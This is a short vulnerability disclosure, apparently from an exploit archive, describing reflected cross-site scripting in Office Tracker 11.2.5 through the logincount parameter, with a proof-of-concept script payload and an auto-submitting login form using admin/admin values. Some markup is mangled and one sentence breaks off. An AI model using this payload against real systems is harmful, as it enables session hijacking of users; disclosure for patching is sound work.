Office Tracker 11.2.5 Cross Site Scripting

Office Tracker version 11.2.5 suffers from a cross site scripting vulnerability.

MD5 | a458952c5d53a047d2ebccfe52183690

# Title: Office Tracker 11.2.5 - XSS

# Author: Nassim Asrir

# Contact: [email protected]

# Vendor:

# CVE: CVE-2017-18023

# Description

Office Tracker 11.2.5 has XSS via the
logincount parameter to the /otweb/OTPClientLogin URI.


# Details

The value of the logincount request parameter is copied into the HTML
document as plain text between tags. The payload
chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount
parameter. This input was echoed unmodified in the application's


# Vulnerability Type

Cross Site Scripting (XSS)


# Attack Type



<scripthistory.pushState('', '', '/')</script
<form action="http://server/otweb/OTPClientLogin" method="POST"
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" /
<input type="hidden" name="lastname" value="MorisonM" /
<input type="hidden" name="timezone" value="" /
<input type="hidden" name="uid" value="" /
<input type="hidden" name="phone" value="false" /
<input type="hidden" name="login" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="submitbtn" value="Login" /
<input type="submit" value="Submit request" /


Related Posts